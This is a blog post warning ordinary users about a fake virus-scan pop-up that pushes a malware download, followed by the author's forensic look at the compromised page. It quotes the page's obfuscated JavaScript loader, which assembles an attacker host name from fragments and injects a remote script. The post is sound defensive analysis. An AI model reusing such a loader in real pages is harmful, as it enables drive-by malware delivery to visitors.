John C. Kirk (johnckirk) wrote,
John C. Kirk

Fake virus warnings

Someone called me earlier, because she had a big virus warning on her screen. This was actually a hoax (a web page trying to install malware), so it's useful to be aware of it, so that you know what to recognise.

At the moment, you can duplicate this if you go to this page:
I've deliberately changed "http" to "hxxp", so that you don't click on it by accident. This is a malicious site, so only go there if you're sure that you can get away safely. I've observed the same behaviour in IE8 and Firefox 3.6.12 (on Windows 7), but I haven't tried any other OS/browser.

The main webpage disappears, and instead you get a message box:

Message from webpage

Note that this says "Message from webpage", i.e. this has come from the internet, not your local computer. (The equivalent Firefox message tells you which website has generated it.) At this point, you should get rid of the message without clicking "OK" or the red X. I tried Alt+F4 (in IE), but that still acted as if I'd clicked OK, so the only certain method is to run Task Manager, select this app, then click "End Task".

Anyway, if you do click "OK", you then see a window like this, which appears to be doing a virus scan:

Security Analysis

As a general tip, any program that claims to have scanned your entire hard drive in a couple of seconds is lying!

If you try to get rid of this window, it nags you to stick around:

Don't leave me!

If you click anywhere on the "Security Analysis" screen, it prompts you to download a file:


That's the whole purpose of the exercise - the people who set up the hoax want you to run this file, which will then do something nasty to your computer, e.g. joining their botnet. So, you don't want this file! If you get this far, use Task Manager to shut down the web browser completely.

In theory, you could download the program, scan it for viruses, then run it if it's safe. However, I used McAfee VirusScan Enterprise 8.7 (with all the latest security updates), and that told me that the file was clean. In fairness, I haven't actually run the program, so I am just assuming that it's bad. However, I trust my instincts more than I trust any anti-virus software.

So, if your computer suddenly tells you that you've got loads of viruses, don't panic. If you're not sure what to do, ask for advice. This certainly applies if you're at work: I think I speak for all IT staff when I say that we'd much rather help you out beforehand than clean up the mess afterwards.

The rest of this post is a bit more "forensic", since I've been trying to work out how this happened. This will be very technical, so don't bother reading if you're not an IT person :) If you are a techie, you may be able to help out where I've got stuck. As far as I can tell, here are the steps to reproduce the problem:

1. Go to Google.

2. Do an image search for "map of central america" (without the quotes).

3. The 12th image (at the time of writing) looks like this:
Central America
and it takes you to:
(Again, I've mangled the URL to avoid accidental clicking.)

I think that's it, so I can't fault anyone for being taken in. I don't see the fake virus warning on my PC, but based on the firewall logs and my examination of the page, that's all the other person did. Mind you, it's also odd that the virus warning apparently appeared 10 minutes later, so she thought that it was from a different site.

The bigbestmovie page has 4 maps at the top, which are all "stolen" (hotlinked) from other sites. In particular, the one that showed up in the Google image results is this one:
as used on this page:
Just to clarify, the "God's Geography" site looks completely safe, and they have nothing to do with the dodgy stuff going on elsewhere; they're just an innocent bystander.

Looking at the HTML source for the bigbestmovie page, it has 3 blocks of JavaScript at the start of the <body> section:

<script language='JavaScript' >
var c1 = "partner.js?frm="+encodeURIComponent(document.referrer)+"&default_keyword="+document.title;
var x1 = "/"+c1;
var y1 = "<s"+"cript language='JavaScript' src='"+x1+"' ><"+"/"+"script>";
<script language='JavaScript' >
var b1="ucy";
var b2="gan";
var b3="ijo";
var b4=".dy";
var b5="ndn";
var b6="s-s";
var b7="erv";
var b8="er.";
var b9="com";
var c = "partner.js?num=114&frm="+encodeURIComponent(document.referrer)+"&default_keyword="+document.title;
var x = "http://"+b1+b2+b3+b4+b5+b6+b7+b8+b9+"/"+c;
var y = "<s"+"cript language='JavaScript' src='"+x+"' ><"+"/"+"script>";
<script src="/nlc/in.cgi?14"></script>

The first 2 get replaced at runtime, so the block then looks like this:

<script language='JavaScript' src='/partner.js?frm=GOOGLE&default_keyword=DOCTITLE' ></script>
<script language='JavaScript' src='hxxp://' ></script>"
<script src="/nlc/in.cgi?14"></script>

The bits in CAPITALS are just placeholders: GOOGLE is the URL of the Google results page, and DOCTITLE is the title of this ( page. So, the first line would really look something like this:


The second JavaScript file is a bit odd, because the server name changed. The firewall logs referred to:
rather than:
hxxp:// is a legitimate site, which sells sub-domains in "" and "" (among others), so agosagyvux and ucyganijo are the equivalent of LiveJournal usernames. I assume that they both belong to the same person, although I'm not sure why he's using DynDNS at all. Maybe the dodgy code is being hopped around to different machines on a botnet? That being the case, it's curious that the page also got updated to refer to a different name, particularly in such a short space of time (less than 2 hours).

I've tried to download the partner.js files, but if I just request the files themselves (no parameters) then I get a 404 error. If I supply the full address from the firewall log, I can download something. However, the one from is a 0 byte file, and the one from the DynDNS site is only 2 bytes (appearing as whitespace in Notepad). This may mean that there's something sneaky going on, so you only get the real JavaScript file if there's a referring page, but I can't find any copies in my cache. Alternately, they may both be red herrings, with the real work being done in the CGI file, e.g. that might be generating new JavaScript on the fly. Any suggestions would be welcome.

If I go to:
then it redirects me to:
which just has a list of YouTube videos. This seems like an overtly innocent site, i.e. it's deliberately intended to divert suspicion. I'm not sure what the uid is for; maybe this site is a front for lots of malware sites, and they want to keep track of their customers?

If I pass a parameter to the site, as above:
it then redirects me to a different site. Again, I've found that the addresses keep changing, which makes it hard to do any effective blocking. Initially, it went to:
I noticed that this URL is similar to the one above, i.e. they're both Indian sites containing numbers and punctuation. According to whois for India, they are indeed both registered to the same person:
Adam Allen, 87 Columbia Heights, New York 11013

On subsequent visits, the "new-protectionsoft23" page has also redirected me to:
I haven't bothered doing a search, but I'm guessing that these domains also belong to the same guy.

I've got that far, but now I'm stuck. Should I report this to someone? If so, whom? I don't know whether the site is directly involved in this, or whether they've been hacked. However, even in the best case scenario they look a bit dodgy, i.e. stealing content and throwing in phrases like "miss america" to attract search engines, and for practical purposes they're still dangerous to visitors. Google might be willing to block that site from their search results; the only snag is that I can't duplicate the problem on my machine, so they might not get it either. Again, any suggestions would be welcome.

Ah well, if nothing else it's been an interesting exercise.
Tags: computers, security

  • Full moon swims

    As I've mentioned before, I like outdoor swimming when the sun's out: the water looks very inviting when I can see the sunlight reflecting off it.…

  • UK CWSC 2015

    A few weeks ago (Sat 24th January), I took part in the UK Cold Water Swimming Championships at Tooting Bec Lido. This runs every 2 years…

  • 2013/2014 in review

    I didn't get round to doing a review post last year, so here's a bumper double-edition. (Hey, if it's good enough for TV guides then it's good enough…

  • Post a new comment


    Anonymous comments are disabled in this journal

    default userpic

    Your reply will be screened

    Your IP address will be recorded